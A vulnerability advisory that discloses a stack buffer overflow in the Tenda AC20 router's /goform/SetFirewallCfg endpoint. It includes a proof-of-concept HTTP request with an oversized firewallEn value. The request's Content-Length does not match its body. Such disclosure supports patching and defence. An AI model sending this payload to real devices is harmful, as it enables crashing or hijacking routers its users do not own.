​​Vulnerability Details:​​

​​Type:​​ Common Vulnerability

​​Vendor:​​ Tenda

​​Vendor Website:​​ https://tenda.com.cn/

​​Affected Device Type:​​ Network Devices (Switches, Routers, etc.)

​​Affected Product:​​ AC20

​​Affected Versions:​​ AC20V1.0re_V16.03.08.05

​​Component Vulnerability:​​ No

​​Vulnerability Name:​​ Buffer Overflow Vulnerability in Tenda AC20's /goform/SetFirewallCfg (Binary Exploit Vulnerability)

Version:​​ V1.0re_V16.03.08.05

​​Trigger Location:​​

In the `/goform/SetFirewallCfg` handler (httpd), the `strcpy(local_98,__s);` operation copies user-controlled `firewallEn` data to a fixed stack buffer without bounds checking.

POC：
POST /goform/SetFirewallCfg HTTP/1.1
Host: 192.168.110.139
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0
Accept: */*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.110.139
Referer: http://192.168.110.139/firewall.html?random=0.0941533565698277&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: x-hng=lang=zh-CN&domain=192.168.110.139
Content-Length: 15

firewallEn=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111



Vulnerability Description:​​

A stack-based buffer overflow vulnerability exists in Tenda AC20 router via the `/goform/SetFirewallCfg` endpoint. The vulnerability occurs when processing the `firewallEn` parameter: after verifying input length > 3 via `strlen()`, the program uses unsafe `strcpy()` to copy user-controlled data into a fixed-size stack buffer (local_98[152 bytes]). Due to missing upper-bound length validation, attackers can craft oversized payloads to overflow the buffer. Successful exploitation could allow denial of service, arbitrary code execution.
​​Workaround Solution:​​

Add length validation for the firewallE.

​​Permanent Solution:​​

Add length validation for the firewallE.
